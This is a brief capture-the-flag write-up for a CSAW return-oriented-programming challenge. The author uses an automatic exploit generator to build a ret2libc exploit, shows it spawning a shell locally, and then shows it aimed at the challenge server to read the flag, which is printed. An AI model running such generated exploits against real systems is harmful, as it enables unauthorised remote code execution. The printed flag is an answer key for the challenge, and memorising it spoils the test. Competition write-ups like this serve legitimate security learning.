Tags: auto_pwn 

So I just solved this using my autopwner, which you can find at https://github.com/guyinatuxedo/remenissions

```
$ remenissions -b rop -l libc-2.27.so
```

and after it runs, it will auto-generate an exploit for you:

```
$ python3 verfied-exploit-Ret2Libc-0.py
[+] Starting local process './rop': pid 6213
[*] running in new terminal: /usr/bin/gdb -q "./rop" 6213
[-] Waiting for debugger: debugger exited! (maybe check /proc/sys/kernel/yama/ptrace_scope)
libc base is: 0x7f85b8caf000
[*] Switching to interactive mode
Hello
$ w
13:18:35 up 1:35, 1 user, load average: 0.70, 0.24, 0.16
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
guyinatu :0 :0 11:51 ?xdm? 2:38 0.00s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu gnome-session --session=ubuntu
$ ls
libc-2.27.so remenissions-work rop verfied-exploit-Ret2Libc-0.py
```

To run it against the remote server, just change it to point to the challenge server instead of running locally:

```
$ vim verfied-exploit-Ret2Libc-0.py
```

Comment out the lower two lines and add the top one:

```
target = remote("pwn.chal.csaw.io", 5016)
#target = process("./rop", env={"LD_PRELOAD":"./libc-2.27.so"})
#gdb.attach(target)
```

Then you can just run the script and get the flag:

```
$ python3 verfied-exploit-Ret2Libc-0.py
[+] Opening connection to pwn.chal.csaw.io on port 5016: Done
libc base is: 0x7ff3f6635000
[*] Switching to interactive mode
Hello
$ w
20:21:04 up 4 days, 17:41, 0 users, load average: 0.56, 0.71, 0.72
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
$ ls
flag.txt
rop
$ cat flag.txt
flag{r0p_4ft3r_r0p_4ft3R_r0p}
```

Original writeup (https://github.com/guyinatuxedo/nightmare/tree/master/modules/45-automatic_exploit_generation).